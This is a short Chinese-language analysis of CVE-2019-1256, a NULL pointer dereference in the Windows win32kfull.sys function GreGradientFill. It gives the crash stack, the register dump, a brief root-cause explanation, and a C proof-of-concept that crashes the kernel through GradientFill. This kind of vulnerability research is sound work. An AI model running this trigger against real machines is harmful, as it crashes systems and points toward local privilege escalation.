CVE-2019-1256漏洞分析

0x00漏洞信息

漏洞影响：本地提权

漏洞文件：win32kfull.sys

漏洞函数：GreGradientFill

漏洞原因：空指针引用

分析系统：Windows 1903

【漏洞分析合集】

0x01漏洞分析

崩溃时的堆栈：

nt!DbgBreakPointWithStatus
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x952
nt!KeBugCheckEx+0x107    
nt!KiBugCheckDispatch+0x69
nt!KiSystemServiceHandler+0x7c
nt!RtlpExecuteHandlerForException+0xf
nt!RtlDispatchException+0x4a5
nt!KiDispatchException+0x16e
nt!KiExceptionDispatch+0x11d
nt!KiPageFault+0x445
win32kfull!GreGradientFill+0x26b
win32kfull!NtGdiGradientFill+0x1c4
nt!KiSystemServiceCopyEnd+0x25
win32u!NtGdiGradientFill+0x14
gdi32full!GdiGradientFill+0x108

在选择Bitmap 时提前改hdc 标志导致 SURFACE对象赋值代码跳过 导致 SURFACE对象 0x30对象 为0  对0取值导致 空指针引用 后面造成任意函数调用达到提权

崩溃时寄存器

rax=0000000000110000 rbx=0000000000000000 rcx=ffff8d8a2f7f2894
rdx=0000000000000002 rsi=0000000000000001 rdi=0000000000000000
rip=ffffc93928981c86 rsp=ffff8d8a2f7f2700 rbp=ffff8d8a2f7f2800
 r8=0000000000000003  r9=00000000000000a0 r10=ffffc90d4d1baf20
r11=0000000000000007 r12=0000000000000007 r13=ffffc90d4d34eff0
r14=ffffc90d49fb52c0 r15=ffffc90d4d34ef80
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b            efl=00050246
win32kfull!NtGdiGradientFill+0x416:
ffffc939`28981c86 8b4328          mov     eax,dword ptr [rbx+28h] ds:002b:00000000`00000028=????????

0x02验证poc

#include <windows.h>
#pragma comment(lib,"msimg32.lib")
typedef HBITMAP(NTAPI* myfull)(HBITMAP, int);


int main()
{
    LoadLibraryA("user32.dll");
    HMODULE gdi = LoadLibraryA("gdi32.dll");
    myfull myfull1 = (myfull)GetProcAddress(gdi, "SetBitmapAttributes");
    //__debugbreak();
    HDC hdc1 = CreateCompatibleDC(0x0);
    HBITMAP hbm1 = CreateBitmap(0x10001, 0x9, 0x0, 0x0, 0x0);
    HBITMAP hbm2 = myfull1(hbm1, 0x1);
    SelectObject(hdc1, hbm2);
    TRIVERTEX vert[7] = { { 0xc9b, 0xfff, 0x3, 0x5, 0x8, 0x10001 },  { 0x8, 0x4, 0x8, 0x1, 0x3, 0xffffffff80000000 },
                          { 0x1, 0xffffffffffffffc1, 0x3, 0x8000, 0x3000000000, 0x2630 }, { 0x7ff, 0x2, 0x0, 0x3, 0x4 },
                          { 0x5, 0x4, 0x1, 0x8001, 0x7ff, 0x5 }, { 0x100000000, 0x5, 0x0, 0x8000, 0x9, 0x9 }, { 0 } };
    GRADIENT_RECT rect[2] = { { 0x3, 0x7 } };
   
    GradientFill(hdc1, vert, 0x7, &rect, 0x1, 0x0);
}